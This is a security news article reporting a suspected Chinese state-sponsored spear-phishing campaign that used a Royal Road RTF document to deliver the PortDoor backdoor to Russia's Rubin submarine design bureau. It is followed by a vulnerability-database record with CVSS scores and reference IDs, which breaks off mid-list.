New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer

2021-05-03T07:34:00

Description

[![Nuclear Submarine Designer](https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>) A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed "**PortDoor**," according to Cybereason's Nocturnus threat intelligence team. "Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines. [![Nuclear Submarine Designer](https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) --- Content of the weaponized RTF document Over the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets. This newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of "8.t," the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called "e.o" to fetch the PortDoor implant, implying a new variant of the weaponizer in use. Said to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server. "The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests," the researchers said. Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "description": "[![Nuclear Submarine Designer](https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[![Nuclear Submarine Designer](https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-05-03T07:34:00", "modified": "2021-05-03T16:14:45", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "immutableFields": [], "lastseen": "2022-05-09T12:38:16", "viewCount": 967, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0B0854A8-58D2-4F1A-BC91-A6826E1A8548", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2019-0847"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0798", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0798", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011651", "KB4011656", "KB4011658", "KB4011659"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS18_JAN_WORD.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812711", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-102370"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:125A440CBDB25270B696C1CCC246BEA1", "THN:33C1B889CF989DEEEDFD8271BE2B363A", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:D31D6F701E39475F33D37784AE99E07E", "THN:DADA9CB340C28F942D085928B22B103F", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", 